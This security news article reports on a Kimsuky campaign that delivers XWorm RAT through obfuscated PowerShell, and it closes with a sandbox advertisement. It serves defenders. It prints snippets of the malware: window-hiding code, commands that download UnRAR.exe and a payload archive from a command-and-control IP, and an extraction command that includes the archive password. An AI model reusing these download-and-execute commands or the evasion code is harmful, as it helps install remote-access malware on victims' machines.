A sophisticated campaign by the Kimsuky Advanced Persistent Threat (APT) group has been identified, utilizing elaborate PowerShell payloads to deliver the dangerous XWorm Remote Access Trojan (RAT).

This North Korean-linked threat actor has evolved its tactics, leveraging heavily obfuscated PowerShell scripts as the initial infection vector to establish persistent access to victim systems while evading traditional security measures.

The XWorm RAT provides attackers with comprehensive remote control capabilities, including file manipulation, keylogging, screen capturing, and command execution.

By communicating with command and control (C2) servers, the malware receives instructions and exfiltrates sensitive data, making it a powerful addition to Kimsuky’s arsenal.

The use of PowerShell—a legitimate administrative tool—enables the group to bypass many traditional security solutions that primarily focus on executable files.

An early stage Malware Analyst and Threat Researcher, Shubho57 noted the sophisticated nature of this attack after analyzing two PowerShell payloads attributed to Kimsuky and XWorm RAT.

Through meticulous reverse engineering, Shubho57 discovered that both payloads were Base64 encoded and designed to establish Remote Desktop Protocol (RDP) connections to victim systems, bypassing hypervisor security controls.

The impact of this campaign extends beyond immediate data theft, as the RAT provides persistent access that facilitates long-term intelligence gathering.

Organizations handling sensitive geopolitical information face heightened risks from this campaign, which demonstrates Kimsuky’s continued focus on espionage operations.

Analysis reveals a multi-stage attack chain beginning with encoded PowerShell scripts that download and execute additional payloads from C2 servers.

The attack leverages a process tree that includes multiple instances of cmd[.]exe and PowerShell[.]exe, along with legitimate Windows binaries—a technique known as Living-off-the-Land Binaries and Scripts (LOLBAS)—to evade detection.

Infection Mechanism and Payload Execution

The infection process begins when victims execute an obfuscated PowerShell script.

This initial script employs sophisticated evasion techniques, including window-hiding functionality implemented through inline C# code.

A crucial component reveals how the malware hides both PowerShell and Windows Terminal windows from the user:

$fd = Get-Process -Name powershell,WindowsTerminal
foreach ($fz in $fd) {
    [WinHpXN]::SwMng($fz.Id, 0)
}

Following successful execution, the script communicates with two primary C2 servers: 185.235.128.114 and 92.119.114.128.

The malware downloads additional components, first retrieving a decoy PDF file to distract the victim while malicious activities continue in the background.

Subsequently, it downloads UnRAR.exe along with password-protected archives containing the core payloads:-

Invoke-WebRequest -Uri "http://185.235.128.114/css/UnRAR.exe" -OutFile "$env:TEMP\UnRAR.exe"
Invoke-WebRequest -Uri "http://185.235.128.114/fonts/eworvolt.rar" -OutFile "$env:TEMP\eworvolt.rar"
cmd[.]exe /C "$env:TEMP\UnRAR.exe x -ppoiuytrewq1234 -o+ $env:TEMP\eworvolt.rar $env:TEMP"

The extracted files—eworvolt.exe and enwtsv.exe—are executed multiple times, likely to ensure persistence and accomplish different malicious objectives.

The final stage involves creating and executing an additional PowerShell script that runs with execution policy bypassed to maintain access.

The campaign employs multiple MITRE ATT&CK techniques, including Command and Scripting Interpreter (PowerShell and Windows Command Shell), Deobfuscate/Decode Files or Information, and Data Encoding for C2 communications.

Security teams are advised to implement robust PowerShell logging and monitoring solutions while updating threat intelligence to include the indicators of compromise associated with this campaign.

Equip your SOC team with deep threat analysis for faster response -> Get Extra 𝗦𝗮𝗻𝗱𝗯𝗼𝘅 𝗹𝗶𝗰𝗲𝗻𝘀𝗲𝘀 for Free